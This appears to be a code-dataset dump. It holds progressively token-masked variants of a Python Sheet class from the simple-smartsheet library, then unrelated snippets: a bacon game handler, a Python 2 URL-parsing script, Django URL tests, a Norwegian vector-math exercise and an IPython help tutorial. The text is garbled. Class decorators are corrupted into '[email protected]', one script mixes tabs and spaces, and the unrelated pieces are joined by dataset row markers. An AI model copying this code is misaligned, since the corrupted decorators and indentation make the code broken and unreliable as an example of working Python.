ValueError(f'Column {column!r} does not have ID')\n cell = Cell.create_multi_picklist(column_id=column.id, values=\n field_value)\n else:\n cell = Cell(column_id=column.id, value=field_value)\n return cell\n\n def make_cells(self, fields: Dict[str, Any]) ->List[Cell]:\n \"\"\"Create a list of Cell objects from dictionary\n\n Args:\n fields: dictionary where key is a column title and value is a cell value\n\n Returns:\n list of Cell objects\n \"\"\"\n result: List[Cell] = []\n for column_title, field_value in fields.items():\n result.append(self.make_cell(column_title, field_value))\n return result\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in 
self.rows]\n\n def as_dataframe(self) ->'pd.DataFrame':\n \"\"\"Return the sheet as pandas DataFrame\n\n Columns will includes row id, row number and all columns from the sheet\n Pandas must be installed either separately or as extras:\n `pip install simple-smartsheet[pandas]`\n \"\"\"\n import pandas as pd\n df = pd.DataFrame([row.as_series() for row in self.rows])\n return df\n",
"<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<assignment token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass _SheetBase(CoreObject, Generic[RowT, ColumnT]):\n <docstring token>\n name: str\n id: Optional[int] = None\n access_level: Optional[str] = None\n permalink: Optional[str] = None\n favorite: Optional[bool] = None\n created_at: Optional[datetime] = None\n modified_at: Optional[datetime] = None\n version: Optional[int] = None\n total_row_count: Optional[int] = None\n effective_attachment_options: List[str] = attr.Factory(list)\n gantt_enabled: Optional[bool] = None\n read_only: Optional[bool] = None\n dependencies_enabled: Optional[bool] = None\n resource_management_enabled: Optional[bool] = None\n cell_image_upload_enabled: Optional[bool] = None\n user_settings: Optional[UserSettings] = None\n user_permissions: Optional[UserPermissions] = None\n has_summary_fields: Optional[bool] = None\n is_multi_picklist_enabled: Optional[bool] = None\n columns: List[ColumnT] = attr.Factory(list)\n rows: List[RowT] = attr.Factory(list)\n workspace: Optional[Workspace] = None\n _row_num_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _row_id_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _column_title_to_column: Dict[str, ColumnT] = attr.ib(attr.Factory(dict\n ), init=False)\n _column_id_to_column: Dict[int, ColumnT] = attr.ib(attr.Factory(dict),\n init=False)\n indexes: IndexesType = attr.ib(attr.Factory(dict), init=False)\n _schema: ClassVar[Type[SheetSchema]] = SheetSchema\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Sheet(_SheetBase[Row, Column]):\n columns: List[Column] = cast(List[Column], attr.Factory(list))\n rows: List[Row] = attr.Factory(list)\n\n def make_cell(self, column_title: str, field_value: Any) ->Cell:\n \"\"\"Creates a Cell object for an existing column\n\n Args:\n column_title: title of an existing column\n field_value: value of the cell\n\n Returns:\n Cell object\n \"\"\"\n column = self.get_column(column_title)\n if column is None:\n raise ValueError(\n 'A column with the title %s does not exist in this sheet',\n column_title)\n if column.type == ColumnType.MULTI_PICKLIST:\n if not column.id:\n raise ValueError(f'Column {column!r} does not have ID')\n cell = Cell.create_multi_picklist(column_id=column.id, values=\n field_value)\n else:\n cell = Cell(column_id=column.id, value=field_value)\n return cell\n\n def make_cells(self, fields: Dict[str, Any]) ->List[Cell]:\n \"\"\"Create a list of Cell objects from dictionary\n\n Args:\n fields: dictionary where key is a column title and value is a cell value\n\n Returns:\n list of Cell objects\n \"\"\"\n result: List[Cell] = []\n for column_title, field_value in fields.items():\n result.append(self.make_cell(column_title, field_value))\n return result\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n def as_dataframe(self) ->'pd.DataFrame':\n \"\"\"Return the sheet as pandas DataFrame\n\n Columns will includes row id, row number and all columns from the sheet\n Pandas must be installed either separately or as extras:\n `pip 
install simple-smartsheet[pandas]`\n \"\"\"\n import pandas as pd\n df = pd.DataFrame([row.as_series() for row in self.rows])\n return df\n",
"<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<assignment token>\n<class token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Sheet(_SheetBase[Row, Column]):\n columns: List[Column] = cast(List[Column], attr.Factory(list))\n rows: List[Row] = attr.Factory(list)\n\n def make_cell(self, column_title: str, field_value: Any) ->Cell:\n \"\"\"Creates a Cell object for an existing column\n\n Args:\n column_title: title of an existing column\n field_value: value of the cell\n\n Returns:\n Cell object\n \"\"\"\n column = self.get_column(column_title)\n if column is None:\n raise ValueError(\n 'A column with the title %s does not exist in this sheet',\n column_title)\n if column.type == ColumnType.MULTI_PICKLIST:\n if not column.id:\n raise ValueError(f'Column {column!r} does not have ID')\n cell = Cell.create_multi_picklist(column_id=column.id, values=\n field_value)\n else:\n cell = Cell(column_id=column.id, value=field_value)\n return cell\n\n def make_cells(self, fields: Dict[str, Any]) ->List[Cell]:\n \"\"\"Create a list of Cell objects from dictionary\n\n Args:\n fields: dictionary where key is a column title and value is a cell value\n\n Returns:\n list of Cell objects\n \"\"\"\n result: List[Cell] = []\n for column_title, field_value in fields.items():\n result.append(self.make_cell(column_title, field_value))\n return result\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n def as_dataframe(self) ->'pd.DataFrame':\n \"\"\"Return the sheet as pandas DataFrame\n\n Columns will includes row id, row number and all columns from the sheet\n Pandas must be installed either separately or as extras:\n `pip install simple-smartsheet[pandas]`\n \"\"\"\n import pandas as pd\n df = pd.DataFrame([row.as_series() for row in self.rows])\n return df\n",
"<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<assignment token>\n<class token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Sheet(_SheetBase[Row, Column]):\n columns: List[Column] = cast(List[Column], attr.Factory(list))\n rows: List[Row] = attr.Factory(list)\n\n def make_cell(self, column_title: str, field_value: Any) ->Cell:\n \"\"\"Creates a Cell object for an existing column\n\n Args:\n column_title: title of an existing column\n field_value: value of the cell\n\n Returns:\n Cell object\n \"\"\"\n column = self.get_column(column_title)\n if column is None:\n raise ValueError(\n 'A column with the title %s does not exist in this sheet',\n column_title)\n if column.type == ColumnType.MULTI_PICKLIST:\n if not column.id:\n raise ValueError(f'Column {column!r} does not have ID')\n cell = Cell.create_multi_picklist(column_id=column.id, values=\n field_value)\n else:\n cell = Cell(column_id=column.id, value=field_value)\n return cell\n <function token>\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n def as_dataframe(self) ->'pd.DataFrame':\n \"\"\"Return the sheet as pandas DataFrame\n\n Columns will includes row id, row number and all columns from the sheet\n Pandas must be installed either separately or as extras:\n `pip install simple-smartsheet[pandas]`\n \"\"\"\n import pandas as pd\n df = pd.DataFrame([row.as_series() for row in self.rows])\n return df\n",
"<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<assignment token>\n<class token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Sheet(_SheetBase[Row, Column]):\n columns: List[Column] = cast(List[Column], attr.Factory(list))\n rows: List[Row] = attr.Factory(list)\n\n def make_cell(self, column_title: str, field_value: Any) ->Cell:\n \"\"\"Creates a Cell object for an existing column\n\n Args:\n column_title: title of an existing column\n field_value: value of the cell\n\n Returns:\n Cell object\n \"\"\"\n column = self.get_column(column_title)\n if column is None:\n raise ValueError(\n 'A column with the title %s does not exist in this sheet',\n column_title)\n if column.type == ColumnType.MULTI_PICKLIST:\n if not column.id:\n raise ValueError(f'Column {column!r} does not have ID')\n cell = Cell.create_multi_picklist(column_id=column.id, values=\n field_value)\n else:\n cell = Cell(column_id=column.id, value=field_value)\n return cell\n <function token>\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n <function token>\n",
"<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<assignment token>\n<class token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Sheet(_SheetBase[Row, Column]):\n columns: List[Column] = cast(List[Column], attr.Factory(list))\n rows: List[Row] = attr.Factory(list)\n <function token>\n <function token>\n\n def as_list(self) ->List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n <function token>\n",
"<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<assignment token>\n<class token>\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Sheet(_SheetBase[Row, Column]):\n columns: List[Column] = cast(List[Column], attr.Factory(list))\n rows: List[Row] = attr.Factory(list)\n <function token>\n <function token>\n <function token>\n <function token>\n",
"<import token>\n<code token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<assignment token>\n<class token>\n<class token>\n"
] | false |
99,852 | 62de685cd20177acb37fa3b6903469deb998c566 | import bacon
class Game(bacon.Game):
def on_tick(self):
bacon.clear(0, 0, 0, 1)
def on_mouse_button(self, button, pressed):
print('bacon.MouseButtons.%s was %s' % (bacon.MouseButtons.tostring(button), 'pressed' if pressed else 'released'))
bacon.run(Game()) | [
"import bacon\n\nclass Game(bacon.Game):\n def on_tick(self):\n bacon.clear(0, 0, 0, 1)\n\n def on_mouse_button(self, button, pressed):\n print('bacon.MouseButtons.%s was %s' % (bacon.MouseButtons.tostring(button), 'pressed' if pressed else 'released'))\n\nbacon.run(Game())",
"import bacon\n\n\nclass Game(bacon.Game):\n\n def on_tick(self):\n bacon.clear(0, 0, 0, 1)\n\n def on_mouse_button(self, button, pressed):\n print('bacon.MouseButtons.%s was %s' % (bacon.MouseButtons.tostring\n (button), 'pressed' if pressed else 'released'))\n\n\nbacon.run(Game())\n",
"<import token>\n\n\nclass Game(bacon.Game):\n\n def on_tick(self):\n bacon.clear(0, 0, 0, 1)\n\n def on_mouse_button(self, button, pressed):\n print('bacon.MouseButtons.%s was %s' % (bacon.MouseButtons.tostring\n (button), 'pressed' if pressed else 'released'))\n\n\nbacon.run(Game())\n",
"<import token>\n\n\nclass Game(bacon.Game):\n\n def on_tick(self):\n bacon.clear(0, 0, 0, 1)\n\n def on_mouse_button(self, button, pressed):\n print('bacon.MouseButtons.%s was %s' % (bacon.MouseButtons.tostring\n (button), 'pressed' if pressed else 'released'))\n\n\n<code token>\n",
"<import token>\n\n\nclass Game(bacon.Game):\n\n def on_tick(self):\n bacon.clear(0, 0, 0, 1)\n <function token>\n\n\n<code token>\n",
"<import token>\n\n\nclass Game(bacon.Game):\n <function token>\n <function token>\n\n\n<code token>\n",
"<import token>\n<class token>\n<code token>\n"
] | false |
99,853 | c77dbcde2d4bda000a4d813c0a7acc92fb4c6c77 | #!/usr/bin/python
# extract the function args from url query parameters to create function args itemset
from urlparse import urlparse
import sys
def pathsplit(x): return x.split('/')
def argsplit(x): return x.split('=')
def argname(x): return len(x) == 2 and x[0] + "= " + x[1] + "&" or x[0] + "="
def pathname(x): return x and x + "/"
for line in sys.stdin:
url = urlparse(line.rstrip('\n'))
if url.scheme == "http":
if url.query != "":
print ' '.join(map (pathname, url.path.split("/"))) + ' ' + ' '.join(map (argname, map(argsplit, url.query.split("&"))))
else:
print ' '.join(map (pathname, url.path.split("/")))
| [
"#!/usr/bin/python\n\n# extract the function args from url query parameters to create function args itemset\n\nfrom urlparse import urlparse\nimport sys\n\ndef pathsplit(x): return x.split('/')\ndef argsplit(x): return x.split('=')\ndef argname(x): return len(x) == 2 and x[0] + \"= \" + x[1] + \"&\" or x[0] + \"=\"\ndef pathname(x): return x and x + \"/\"\n\nfor line in sys.stdin:\n url = urlparse(line.rstrip('\\n'))\n if url.scheme == \"http\":\n\tif url.query != \"\":\n print ' '.join(map (pathname, url.path.split(\"/\"))) + ' ' + ' '.join(map (argname, map(argsplit, url.query.split(\"&\"))))\n else:\n print ' '.join(map (pathname, url.path.split(\"/\")))\n\n"
] | true |
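The code field of record 99,853 above is Python 2 (the urlparse module and print statements), which likely accounts for the record's error: true flag. As an illustrative aside, not part of the dataset, a minimal Python 3 sketch of the same idea (turning a URL's path segments and query keys into a space-separated itemset) could look as follows; the function name is an assumption and the query-value formatting is simplified relative to the record.

# Hypothetical Python 3 rendition (illustrative only; names are assumptions).
import sys
from urllib.parse import urlparse, parse_qsl


def url_to_itemset(line):
    """Turn one http URL into a space-separated itemset of path segments and query keys."""
    url = urlparse(line.strip())
    if url.scheme != 'http':
        return ''
    path_tokens = [segment + '/' for segment in url.path.split('/') if segment]
    query_tokens = [key + '=' for key, _ in parse_qsl(url.query, keep_blank_values=True)]
    return ' '.join(path_tokens + query_tokens)


if __name__ == '__main__':
    for line in sys.stdin:
        itemset = url_to_itemset(line)
        if itemset:
            print(itemset)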
99,854 | 4e4cc9f84d8cbdcb255d067a946e8eece97512ab | from django.urls import resolve, reverse
class TestUrls:
def test_order_detail_url(self):
path = reverse('order-detail', kwargs={'order_id': 15})
assert resolve(path).view_name == 'order-detail'
def test_home_url(self):
path = reverse('coderslab-home')
assert resolve(path).view_name == 'coderslab-home'
def test_pipe_configurator_url(self):
path = reverse('coderslab-pipe_configurator')
assert resolve(path).view_name == 'coderslab-pipe_configurator'
def test_login_url(self):
path = reverse('login')
assert resolve(path).view_name == 'login'
def test_logout_url(self):
path = reverse('logout')
assert resolve(path).view_name == 'logout'
def test_register_url(self):
path = reverse('register')
assert resolve(path).view_name == 'register'
def test_rorder_list_url(self):
path = reverse('order-list')
assert resolve(path).view_name == 'order-list'
| [
"from django.urls import resolve, reverse\n\n\nclass TestUrls:\n\n def test_order_detail_url(self):\n path = reverse('order-detail', kwargs={'order_id': 15})\n assert resolve(path).view_name == 'order-detail'\n\n def test_home_url(self):\n path = reverse('coderslab-home')\n assert resolve(path).view_name == 'coderslab-home'\n\n def test_pipe_configurator_url(self):\n path = reverse('coderslab-pipe_configurator')\n assert resolve(path).view_name == 'coderslab-pipe_configurator'\n\n def test_login_url(self):\n path = reverse('login')\n assert resolve(path).view_name == 'login'\n\n def test_logout_url(self):\n path = reverse('logout')\n assert resolve(path).view_name == 'logout'\n\n def test_register_url(self):\n path = reverse('register')\n assert resolve(path).view_name == 'register'\n\n def test_rorder_list_url(self):\n path = reverse('order-list')\n assert resolve(path).view_name == 'order-list'\n",
"<import token>\n\n\nclass TestUrls:\n\n def test_order_detail_url(self):\n path = reverse('order-detail', kwargs={'order_id': 15})\n assert resolve(path).view_name == 'order-detail'\n\n def test_home_url(self):\n path = reverse('coderslab-home')\n assert resolve(path).view_name == 'coderslab-home'\n\n def test_pipe_configurator_url(self):\n path = reverse('coderslab-pipe_configurator')\n assert resolve(path).view_name == 'coderslab-pipe_configurator'\n\n def test_login_url(self):\n path = reverse('login')\n assert resolve(path).view_name == 'login'\n\n def test_logout_url(self):\n path = reverse('logout')\n assert resolve(path).view_name == 'logout'\n\n def test_register_url(self):\n path = reverse('register')\n assert resolve(path).view_name == 'register'\n\n def test_rorder_list_url(self):\n path = reverse('order-list')\n assert resolve(path).view_name == 'order-list'\n",
"<import token>\n\n\nclass TestUrls:\n\n def test_order_detail_url(self):\n path = reverse('order-detail', kwargs={'order_id': 15})\n assert resolve(path).view_name == 'order-detail'\n\n def test_home_url(self):\n path = reverse('coderslab-home')\n assert resolve(path).view_name == 'coderslab-home'\n\n def test_pipe_configurator_url(self):\n path = reverse('coderslab-pipe_configurator')\n assert resolve(path).view_name == 'coderslab-pipe_configurator'\n <function token>\n\n def test_logout_url(self):\n path = reverse('logout')\n assert resolve(path).view_name == 'logout'\n\n def test_register_url(self):\n path = reverse('register')\n assert resolve(path).view_name == 'register'\n\n def test_rorder_list_url(self):\n path = reverse('order-list')\n assert resolve(path).view_name == 'order-list'\n",
"<import token>\n\n\nclass TestUrls:\n\n def test_order_detail_url(self):\n path = reverse('order-detail', kwargs={'order_id': 15})\n assert resolve(path).view_name == 'order-detail'\n\n def test_home_url(self):\n path = reverse('coderslab-home')\n assert resolve(path).view_name == 'coderslab-home'\n\n def test_pipe_configurator_url(self):\n path = reverse('coderslab-pipe_configurator')\n assert resolve(path).view_name == 'coderslab-pipe_configurator'\n <function token>\n <function token>\n\n def test_register_url(self):\n path = reverse('register')\n assert resolve(path).view_name == 'register'\n\n def test_rorder_list_url(self):\n path = reverse('order-list')\n assert resolve(path).view_name == 'order-list'\n",
"<import token>\n\n\nclass TestUrls:\n\n def test_order_detail_url(self):\n path = reverse('order-detail', kwargs={'order_id': 15})\n assert resolve(path).view_name == 'order-detail'\n\n def test_home_url(self):\n path = reverse('coderslab-home')\n assert resolve(path).view_name == 'coderslab-home'\n\n def test_pipe_configurator_url(self):\n path = reverse('coderslab-pipe_configurator')\n assert resolve(path).view_name == 'coderslab-pipe_configurator'\n <function token>\n <function token>\n <function token>\n\n def test_rorder_list_url(self):\n path = reverse('order-list')\n assert resolve(path).view_name == 'order-list'\n",
"<import token>\n\n\nclass TestUrls:\n\n def test_order_detail_url(self):\n path = reverse('order-detail', kwargs={'order_id': 15})\n assert resolve(path).view_name == 'order-detail'\n\n def test_home_url(self):\n path = reverse('coderslab-home')\n assert resolve(path).view_name == 'coderslab-home'\n <function token>\n <function token>\n <function token>\n <function token>\n\n def test_rorder_list_url(self):\n path = reverse('order-list')\n assert resolve(path).view_name == 'order-list'\n",
"<import token>\n\n\nclass TestUrls:\n\n def test_order_detail_url(self):\n path = reverse('order-detail', kwargs={'order_id': 15})\n assert resolve(path).view_name == 'order-detail'\n\n def test_home_url(self):\n path = reverse('coderslab-home')\n assert resolve(path).view_name == 'coderslab-home'\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n",
"<import token>\n\n\nclass TestUrls:\n <function token>\n\n def test_home_url(self):\n path = reverse('coderslab-home')\n assert resolve(path).view_name == 'coderslab-home'\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n",
"<import token>\n\n\nclass TestUrls:\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n",
"<import token>\n<class token>\n"
] | false |
99,855 | 1d2f2f31dff1352d06b9dad1eb24bb6b748bd09f | # Import modules
import math
# Define the functions
def vektor(x, y, z): # Creates a list of x, y, z coordinates
return [x, y, z]
def vecprint(vec): # Prints the vector in a readable format
print("vector =", vec)
# Returns a vector equal to the input vector multiplied by a scalar
def scalar_multiplication(vec, scalar):
product = []
for i in range(0, len(vec)):
product.append(vec[i] * scalar)
return product
def length(vec, scalar): # Prints the length of a vector, the length after scalar multiplication, and the ratio between the two
v2 = scalar_multiplication(vec, scalar)
l1sqrd = 0
l2sqrd = 0
for i in range(0, len(vec)):
l1sqrd += vec[i]**2
l2sqrd += v2[i]**2
print("Vektorlengde:", math.sqrt(l1sqrd))
print("Vektorlengde etter skalarmultiplikasjon:", math.sqrt(l2sqrd))
print("Forholdet mellom de to er:", math.sqrt(l2sqrd) / math.sqrt(l1sqrd))
return
def scalar_product(vec1, vec2): # Returns the scalar product of two vectors
product = 0
for i in range(0, len(vec1)):
product += vec1[i] * vec2[i]
return product
# Define initial conditions
scalar = float(input("Oppgi en valgfri skalar: "))
vec1 = vektor(1.5, 3.7, 4.5)
vec2 = scalar_multiplication(vec1, scalar)
vec3 = vektor(3.7, -1.5, 0)
# Call the functions
vecprint(vec2)
print()
length(vec1, scalar)
print()
print(scalar_product(vec1, vec3))
| [
"# Importer moduler\nimport math\n\n# Definer funksjonene\n\n\ndef vektor(x, y, z): # Lager en liste av x,y,z koordinater\n return [x, y, z]\n\n\ndef vecprint(vec): # Printer vektoren på en fin måte\n print(\"vector =\", vec)\n\n\n# Returnerer en vektor som er den forrige vektoren ganget med en skalar\ndef scalar_multiplication(vec, scalar):\n product = []\n for i in range(0, len(vec)):\n product.append(vec[i] * scalar)\n return product\n\n\ndef length(vec, scalar): # Printer lengden av en vektor, lengden av vektoren etter skalarmulitplikasjonen og forholdet mellom de to\n v2 = scalar_multiplication(vec, scalar)\n l1sqrd = 0\n l2sqrd = 0\n for i in range(0, len(vec)):\n l1sqrd += vec[i]**2\n l2sqrd += v2[i]**2\n print(\"Vektorlengde:\", math.sqrt(l1sqrd))\n print(\"Vektorlengde etter skalarmultiplikasjon:\", math.sqrt(l2sqrd))\n print(\"Forholdet mellom de to er:\", math.sqrt(l2sqrd) / math.sqrt(l1sqrd))\n return\n\n\ndef scalar_product(vec1, vec2): # Returnerer skalarproduktet av to vektorer\n product = 0\n for i in range(0, len(vec1)):\n product += vec1[i] * vec2[i]\n return product\n\n\n# Definer initialbetingelser\nscalar = float(input(\"Oppgi en valgfri skalar: \"))\nvec1 = vektor(1.5, 3.7, 4.5)\nvec2 = scalar_multiplication(vec1, scalar)\nvec3 = vektor(3.7, -1.5, 0)\n\n\n# Kaller funksjonene\nvecprint(vec2)\nprint()\nlength(vec1, scalar)\nprint()\nprint(scalar_product(vec1, vec3))\n",
"import math\n\n\ndef vektor(x, y, z):\n return [x, y, z]\n\n\ndef vecprint(vec):\n print('vector =', vec)\n\n\ndef scalar_multiplication(vec, scalar):\n product = []\n for i in range(0, len(vec)):\n product.append(vec[i] * scalar)\n return product\n\n\ndef length(vec, scalar):\n v2 = scalar_multiplication(vec, scalar)\n l1sqrd = 0\n l2sqrd = 0\n for i in range(0, len(vec)):\n l1sqrd += vec[i] ** 2\n l2sqrd += v2[i] ** 2\n print('Vektorlengde:', math.sqrt(l1sqrd))\n print('Vektorlengde etter skalarmultiplikasjon:', math.sqrt(l2sqrd))\n print('Forholdet mellom de to er:', math.sqrt(l2sqrd) / math.sqrt(l1sqrd))\n return\n\n\ndef scalar_product(vec1, vec2):\n product = 0\n for i in range(0, len(vec1)):\n product += vec1[i] * vec2[i]\n return product\n\n\nscalar = float(input('Oppgi en valgfri skalar: '))\nvec1 = vektor(1.5, 3.7, 4.5)\nvec2 = scalar_multiplication(vec1, scalar)\nvec3 = vektor(3.7, -1.5, 0)\nvecprint(vec2)\nprint()\nlength(vec1, scalar)\nprint()\nprint(scalar_product(vec1, vec3))\n",
"<import token>\n\n\ndef vektor(x, y, z):\n return [x, y, z]\n\n\ndef vecprint(vec):\n print('vector =', vec)\n\n\ndef scalar_multiplication(vec, scalar):\n product = []\n for i in range(0, len(vec)):\n product.append(vec[i] * scalar)\n return product\n\n\ndef length(vec, scalar):\n v2 = scalar_multiplication(vec, scalar)\n l1sqrd = 0\n l2sqrd = 0\n for i in range(0, len(vec)):\n l1sqrd += vec[i] ** 2\n l2sqrd += v2[i] ** 2\n print('Vektorlengde:', math.sqrt(l1sqrd))\n print('Vektorlengde etter skalarmultiplikasjon:', math.sqrt(l2sqrd))\n print('Forholdet mellom de to er:', math.sqrt(l2sqrd) / math.sqrt(l1sqrd))\n return\n\n\ndef scalar_product(vec1, vec2):\n product = 0\n for i in range(0, len(vec1)):\n product += vec1[i] * vec2[i]\n return product\n\n\nscalar = float(input('Oppgi en valgfri skalar: '))\nvec1 = vektor(1.5, 3.7, 4.5)\nvec2 = scalar_multiplication(vec1, scalar)\nvec3 = vektor(3.7, -1.5, 0)\nvecprint(vec2)\nprint()\nlength(vec1, scalar)\nprint()\nprint(scalar_product(vec1, vec3))\n",
"<import token>\n\n\ndef vektor(x, y, z):\n return [x, y, z]\n\n\ndef vecprint(vec):\n print('vector =', vec)\n\n\ndef scalar_multiplication(vec, scalar):\n product = []\n for i in range(0, len(vec)):\n product.append(vec[i] * scalar)\n return product\n\n\ndef length(vec, scalar):\n v2 = scalar_multiplication(vec, scalar)\n l1sqrd = 0\n l2sqrd = 0\n for i in range(0, len(vec)):\n l1sqrd += vec[i] ** 2\n l2sqrd += v2[i] ** 2\n print('Vektorlengde:', math.sqrt(l1sqrd))\n print('Vektorlengde etter skalarmultiplikasjon:', math.sqrt(l2sqrd))\n print('Forholdet mellom de to er:', math.sqrt(l2sqrd) / math.sqrt(l1sqrd))\n return\n\n\ndef scalar_product(vec1, vec2):\n product = 0\n for i in range(0, len(vec1)):\n product += vec1[i] * vec2[i]\n return product\n\n\n<assignment token>\nvecprint(vec2)\nprint()\nlength(vec1, scalar)\nprint()\nprint(scalar_product(vec1, vec3))\n",
"<import token>\n\n\ndef vektor(x, y, z):\n return [x, y, z]\n\n\ndef vecprint(vec):\n print('vector =', vec)\n\n\ndef scalar_multiplication(vec, scalar):\n product = []\n for i in range(0, len(vec)):\n product.append(vec[i] * scalar)\n return product\n\n\ndef length(vec, scalar):\n v2 = scalar_multiplication(vec, scalar)\n l1sqrd = 0\n l2sqrd = 0\n for i in range(0, len(vec)):\n l1sqrd += vec[i] ** 2\n l2sqrd += v2[i] ** 2\n print('Vektorlengde:', math.sqrt(l1sqrd))\n print('Vektorlengde etter skalarmultiplikasjon:', math.sqrt(l2sqrd))\n print('Forholdet mellom de to er:', math.sqrt(l2sqrd) / math.sqrt(l1sqrd))\n return\n\n\ndef scalar_product(vec1, vec2):\n product = 0\n for i in range(0, len(vec1)):\n product += vec1[i] * vec2[i]\n return product\n\n\n<assignment token>\n<code token>\n",
"<import token>\n\n\ndef vektor(x, y, z):\n return [x, y, z]\n\n\n<function token>\n\n\ndef scalar_multiplication(vec, scalar):\n product = []\n for i in range(0, len(vec)):\n product.append(vec[i] * scalar)\n return product\n\n\ndef length(vec, scalar):\n v2 = scalar_multiplication(vec, scalar)\n l1sqrd = 0\n l2sqrd = 0\n for i in range(0, len(vec)):\n l1sqrd += vec[i] ** 2\n l2sqrd += v2[i] ** 2\n print('Vektorlengde:', math.sqrt(l1sqrd))\n print('Vektorlengde etter skalarmultiplikasjon:', math.sqrt(l2sqrd))\n print('Forholdet mellom de to er:', math.sqrt(l2sqrd) / math.sqrt(l1sqrd))\n return\n\n\ndef scalar_product(vec1, vec2):\n product = 0\n for i in range(0, len(vec1)):\n product += vec1[i] * vec2[i]\n return product\n\n\n<assignment token>\n<code token>\n",
"<import token>\n\n\ndef vektor(x, y, z):\n return [x, y, z]\n\n\n<function token>\n<function token>\n\n\ndef length(vec, scalar):\n v2 = scalar_multiplication(vec, scalar)\n l1sqrd = 0\n l2sqrd = 0\n for i in range(0, len(vec)):\n l1sqrd += vec[i] ** 2\n l2sqrd += v2[i] ** 2\n print('Vektorlengde:', math.sqrt(l1sqrd))\n print('Vektorlengde etter skalarmultiplikasjon:', math.sqrt(l2sqrd))\n print('Forholdet mellom de to er:', math.sqrt(l2sqrd) / math.sqrt(l1sqrd))\n return\n\n\ndef scalar_product(vec1, vec2):\n product = 0\n for i in range(0, len(vec1)):\n product += vec1[i] * vec2[i]\n return product\n\n\n<assignment token>\n<code token>\n",
"<import token>\n\n\ndef vektor(x, y, z):\n return [x, y, z]\n\n\n<function token>\n<function token>\n\n\ndef length(vec, scalar):\n v2 = scalar_multiplication(vec, scalar)\n l1sqrd = 0\n l2sqrd = 0\n for i in range(0, len(vec)):\n l1sqrd += vec[i] ** 2\n l2sqrd += v2[i] ** 2\n print('Vektorlengde:', math.sqrt(l1sqrd))\n print('Vektorlengde etter skalarmultiplikasjon:', math.sqrt(l2sqrd))\n print('Forholdet mellom de to er:', math.sqrt(l2sqrd) / math.sqrt(l1sqrd))\n return\n\n\n<function token>\n<assignment token>\n<code token>\n",
"<import token>\n<function token>\n<function token>\n<function token>\n\n\ndef length(vec, scalar):\n v2 = scalar_multiplication(vec, scalar)\n l1sqrd = 0\n l2sqrd = 0\n for i in range(0, len(vec)):\n l1sqrd += vec[i] ** 2\n l2sqrd += v2[i] ** 2\n print('Vektorlengde:', math.sqrt(l1sqrd))\n print('Vektorlengde etter skalarmultiplikasjon:', math.sqrt(l2sqrd))\n print('Forholdet mellom de to er:', math.sqrt(l2sqrd) / math.sqrt(l1sqrd))\n return\n\n\n<function token>\n<assignment token>\n<code token>\n",
"<import token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n"
] | false |
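Record 99,855 above demonstrates scalar multiplication, vector length, and the scalar product, and prints the ratio of the lengths before and after scaling. As an illustrative aside, not part of the dataset, the same operations can be written compactly with the standard library; the helper names below are assumptions.

# Illustrative sketch of the same vector operations (not part of the dataset).
import math


def length(vec):
    return math.sqrt(sum(x * x for x in vec))


def scale(vec, s):
    return [x * s for x in vec]


def dot(a, b):
    return sum(x * y for x, y in zip(a, b))


v = [1.5, 3.7, 4.5]
s = 2.0
# Scaling a vector by s scales its length by abs(s).
assert math.isclose(length(scale(v, s)), abs(s) * length(v))
# The two vectors used in the record are orthogonal, so this prints 0.0.
print(dot(v, [3.7, -1.5, 0.0]))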
99,856 | 4d7c63585a214e58460f801a8255f12b22fa8f86 | # Access documentation with '?':
# All Python objects contain reference to their respecive docstrings.
# The docstring is simply a brief description of what the object/method does.
len?
help(len) # standard Python interface
L = [1, 2, 3]
L.insert?
L?
# The ? operator also works for functions we define ourselves.
def square(a):
"""Return the square of a."""
return a ** 2
help(square)
square?
# Accessing Source Code with '??':
# In addition to the docstring, ?? yields source code if available.
square??
# Objects without source code are usually implemented in C or another language.
len??
